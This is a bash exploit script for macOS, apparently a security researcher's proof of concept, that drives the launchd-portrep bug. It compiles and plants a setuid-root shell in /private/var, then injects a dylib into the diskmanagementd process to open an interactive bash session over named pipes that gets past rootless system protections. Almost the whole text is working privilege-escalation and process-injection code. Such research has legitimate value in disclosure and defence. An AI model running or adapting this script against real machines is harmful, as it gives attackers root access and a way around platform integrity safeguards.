#! /bin/bash # # launchd-portrep-rootless.sh # Brandon Azad # # An example using launchd-portrep to get a rootless shell. Requires developer tools. # cd "$( dirname "${BASH_SOURCE[0]}" )" error() { echo "Error: $1" exit 1 } make -s || error "Could not build launchd-portrep" cat << EOF > suid-sh.c || error "Could not write suid-sh.c" #include int main(int argc, char **argv) { seteuid(0); setuid(0); setgid(0); argv[0] = "/bin/bash"; return execve(argv[0], argv, NULL); } EOF clang suid-sh.c -o suid-sh || error "Failed to compile suid-sh.c to suid-sh" rm suid-sh.c TARGET_SHELL="/private/var/suid-sh" SHELL_COMMAND="$(which cp) $(pwd)/suid-sh $TARGET_SHELL; $(which chmod) 4555 $TARGET_SHELL" pgrep -q sysdiagnose && error "sysdiagnose is running!" ./launchd-portrep "$SHELL_COMMAND" || error "launchd-portrep failed" rm suid-sh [ -f "$TARGET_SHELL" ] || error "Exploit payload failed to create $TARGET_SHELL" TARGET_PID=$("$TARGET_SHELL" -c "launchctl kickstart -k -p system/com.apple.diskmanagementd" | sed 's/[^0-9]//g') "$TARGET_SHELL" -c "rm '$TARGET_SHELL'" TMP_DIR="$(mktemp -d)" STDIN_FIFO="$TMP_DIR/0" STDOUT_FIFO="$TMP_DIR/1" mkfifo "$STDIN_FIFO" "$STDOUT_FIFO" || error "Could not create named pipes" cat << EOF > rootless-sh.c || error "Could not write rootless-sh.c" #include #include __attribute__((constructor)) static void initialize() { os_log(OS_LOG_DEFAULT, "[%d]: injection successful!\n", getpid()); system("bash -i <'$STDIN_FIFO' >'$STDOUT_FIFO' 2>&1 &"); } EOF clang -dynamiclib rootless-sh.c -o rootless-sh.dylib || error "Failed to compile rootless-sh.c to rootless-sh.dylib" rm rootless-sh.c ./launchd-portrep $TARGET_PID "$PWD"/rootless-sh.dylib || error "launchd-portrep failed" rm rootless-sh.dylib cat "$STDOUT_FIFO" & cat >"$STDIN_FIFO" rm "$STDIN_FIFO" "$STDOUT_FIFO" rm -r "$TMP_DIR"